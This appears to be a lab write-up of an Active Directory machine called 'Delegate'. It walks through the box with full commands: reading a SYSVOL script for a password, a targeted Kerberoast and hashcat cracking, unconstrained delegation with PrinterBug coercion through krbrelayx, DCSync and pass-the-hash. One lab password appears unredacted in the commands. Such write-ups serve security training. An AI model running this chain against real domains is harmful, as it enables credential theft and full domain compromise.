Post

Delegate

A guest SMB session reads a logon script left on SYSVOL that leaks a domain password; GenericWrite enables a targeted Kerberoast for WinRM access; unconstrained delegation with PrinterBug coercion captures the DC's TGT for a full DCSync.

Delegate

Overview

Delegate is a medium-difficulty Windows Active Directory box that walks a realistic three-phase AD attack chain. The foothold is a classic information-disclosure: a near-anonymous guest SMB session can browse SYSVOL, where a logon batch script was left with a password hard-coded in it. That account holds a dangerous ACL — GenericWrite — over a second user, which enables a targeted Kerberoast: plant a fake SPN, crack the ticket offline, log in over WinRM. The final phase chains unconstrained delegation together with the PrinterBug coercion: N.Thompson can set a computer TRUSTED_FOR_DELEGATION, coerce the DC into authenticating to it, capture the DC’s TGT with krbrelayx, and DCSync the Administrator hash.

Machine Matrix

Enumeration Real-Life CVE Custom Exploitation CTF-like

Realistic AD chain: guest SMB reads a SYSVOL script leaking a password, GenericWrite enables a targeted Kerberoast for WinRM, and unconstrained delegation plus PrinterBug coercion captures the DC’s TGT for DCSync. No CVE — BloodHound, impacket, and krbrelayx throughout.

Recon

1
nmap -sVC 10.129.234.69

Delegate Nmap

PortService
53DNS
88Kerberos
135 / 139 / 445RPC / NetBIOS / SMB
389 / 636 / 3268 / 3269LDAP / LDAPS / Global Catalog
464kpasswd
5985WinRM
9389ADWS

The port profile is a textbook Domain Controller. The domain is delegate.vl and the DC is DC1.delegate.vl — add both to /etc/hosts:

1
echo "10.129.234.69 dc1.delegate.vl delegate.vl DC1" | sudo tee -a /etc/hosts

With a DC and no web surface, the first move is to see how much an unauthenticated/guest session can read over SMB.

Enumeration

The guest account is enabled and can list shares:

1
nxc smb 10.129.234.69 -u guest -p '' --shares

Delegate Nmap

SYSVOL is readable. SYSVOL is replicated to every domain controller and is readable by all domain principals — it is meant for logon scripts and policy, never secrets. Spider it for scripts:

1
smbclient //10.129.234.69/SYSVOL -N -c "recurse; ls" 2>/dev/null | grep -iE '\.bat|\.ps1'

Delegate SMBClient

1
2
3
cd delegate.vl\scripts\
wget users.bat
yes

Delegate Grab file

A batch script in the scripts folder contains a plaintext credential for the domain user A.Briggs. Here is the foothold. With a valid domain user, collect the AD graph and look for attack paths:

1
rusthound-ce --domain delegate.vl -u A.Briggs -p '<REDACTED>' --zip

BloodHound shows A.Briggs has GenericWrite over the user N.Thompson. GenericWrite lets you write object attributes — including servicePrincipalName.

Foothold — Targeted Kerberoast

Any account that has an SPN is Kerberoastable: anyone can request a service ticket for it, and that ticket is encrypted with the account’s password hash, crackable offline. A.Briggs cannot read N.Thompson’s password directly, but with GenericWrite it can temporarily plant a fake SPN on N.Thompson, roast it, then clean up — a targeted Kerberoast.

Plant a fake SPN, request the ticket, and remove the SPN afterward:

1
nxc ldap 10.129.234.69 -u A.Briggs -p '<REDACTED>' --kerberoast nt.hash

Crack the roasted ticket (Kerberos 5 TGS-REP, hashcat mode 13100) against rockyou:

1
hashcat -m 13100 nt.hash /usr/share/wordlists/rockyou.txt

The password cracks quickly. N.Thompson is a member of Remote Management Users, so the credential is directly usable over WinRM:

1
evil-winrm -i 10.129.234.69 -u N.Thompson -p '<REDACTED>'

User flag

1
type C:\Users\N.Thompson\Desktop\user.txt

user.txt captured

Privilege Escalation — Unconstrained Delegation + PrinterBug

BloodHound reveals that N.Thompson is a member of delegation admins, a group that effectively grants SeEnableDelegationPrivilege — the right to mark accounts trusted for delegation. The domain also has a non-zero Machine Account Quota, so any domain user can create computer accounts. Those two facts together enable an unconstrained-delegation attack.

How unconstrained delegation works: A computer flagged TRUSTED_FOR_DELEGATION receives a copy of the caller’s TGT whenever someone authenticates to it via Kerberos. If we can coerce a privileged account — like the DC itself — into authenticating to our fake machine, we capture that TGT. A DC’s TGT can request replication permissions and perform a DCSync.

Step 1 — Create a computer and flag it for unconstrained delegation

1
2
bloodyAD -d delegate.vl -u N.Thompson -p 'KALEB_2341' --host dc1.delegate.vl --dc-ip 10.129.234.69 add computer fakedf 'FakeP@ss123!'
bloodyAD -d delegate.vl -u N.Thompson -p 'KALEB_2341' --host dc1.delegate.vl --dc-ip 10.129.234.69 add uac 'fakedf$' -f TRUSTED_FOR_DELEGATION

Compute the NT hash of the computer account password (needed by krbrelayx to decrypt incoming tickets):

1
python3 -c "import hashlib;print(hashlib.new('md4','FakeP@ss123!'.encode('utf-16-le')).hexdigest())"

Unconstrained delegation setup

Step 2 — Add a DNS record pointing the fake computer at the attacker

krbrelayx’s dnstool.py adds an A record for fakedf.delegate.vl pointing to the attacker machine, so coerced Kerberos tickets are sent here:

1
PYTHONNOUSERSITE=1 python3 ~/Downloads/Tools/krbrelayx/dnstool.py -u 'delegate.vl\N.Thompson' -p '<REDACTED>' --action add --record fakedf.delegate.vl --data 10.10.16.13 --type A 10.129.234.69

Step 3 — Start krbrelayx and coerce the DC

Start krbrelayx with the computer’s NT hash so it can decrypt incoming tickets. The < <(sleep 900) keeps stdin open so the listener does not exit when backgrounded:

1
2
sudo PYTHONNOUSERSITE=1 python3 ~/Downloads/Tools/krbrelayx/krbrelayx.py \
  -hashes :<fakedf_nthash> < <(sleep 900)

Then trigger the DC’s Print Spooler to authenticate to fakedf.delegate.vl (PrinterBug / MS-RPRN):

1
2
PYTHONNOUSERSITE=1 python3 ~/Downloads/Tools/krbrelayx/printerbug.py \
  'delegate.vl/N.Thompson:<REDACTED>@10.129.234.69' fakedf.delegate.vl

krbrelayx captures DC1$’s TGT and saves it as a .ccache file.

krbrelayx captures the DC TGT

Step 4 — DCSync

Use the captured DC ticket to perform directory replication and dump the Administrator hash:

1
2
KRB5CCNAME='[email protected][email protected]' \
  impacket-secretsdump -k -no-pass -just-dc-user Administrator dc1.delegate.vl

DCSync dumping Administrator hash

Step 5 — Pass-the-hash to Administrator

1
evil-winrm -i 10.129.234.69 -u Administrator -H <redacted>

Root flag

1
type C:\Users\Administrator\Desktop\root.txt

root.txt captured

Full domain compromise achieved via SYSVOL credential exposure → targeted Kerberoast → unconstrained delegation + PrinterBug coercion → DCSync.

This post is licensed under CC BY 4.0 by the author.